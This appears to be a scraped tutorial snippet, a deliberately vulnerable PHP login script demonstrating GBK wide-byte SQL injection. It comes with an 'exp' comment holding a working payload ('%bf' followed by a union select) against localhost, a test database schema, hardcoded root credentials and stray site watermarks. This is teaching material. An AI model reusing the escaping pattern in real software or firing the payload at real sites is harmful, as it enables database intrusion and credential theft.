<?php
02 /*
03 * code:c4bbage
04 * From:cunlide测试数据
05 */
06 error_reporting(E_ALL);
07 $conn = mysql _connect("localhost","root","toor");
08 mysql_query("SET NAMES 'GBK'");
09 mysql_select_db("test1",$conn);
10 $username=mysql_escape_string($_GET['username']);
11 //$username= addslashes($_GET['username']);
12 var_dump($username);
13 $password=mysql_escape_string($_GET['password']);
14 $sql= "select * from admin where username='$username' and password='$password'";
15 print_r($sql);echo "<br>";
16 $result = mysql_query($sql,$conn);
17 print_r($result);echo "<br>";
18 while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
19 {
20 print_r($row[]=$row);
21 }
HdhCmsTest2cto测试数据
22 /*
23 exp:
24 http://127.0.0.1/sqli.php?username=%bf'union select 1,2,3%23&password=password
25 db file :
26 --test1.sql
27 SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
28 SET time_zone = "+00:00";
29 --gbk database
30 CREATE DATABASE `test1` DEFAULT CHARACTER SET gbk COLLATE gbk_chinese_ci;
31 USE `test1`;
32
33 CREATE TABLE IF NOT EXISTS `admin` (
34 `id` int(11) NOT NULL,
35 `username` varchar(15) NOT NULL,
36 `password` varchar(15) NOT NULL,
37 PRIMARY KEY (`id`)
38 ) ENGINE=InnoDB DEFAULT CHARSET=gbk;
39
40 INSERT INTO `admin` (`id`, `username`, `password`) VALUES
41 (1, 'admin', 'password');
42
43 */
44 ?>
查看更多关于宽字节注入实例 - 网站安全 - 自学php的详细内容...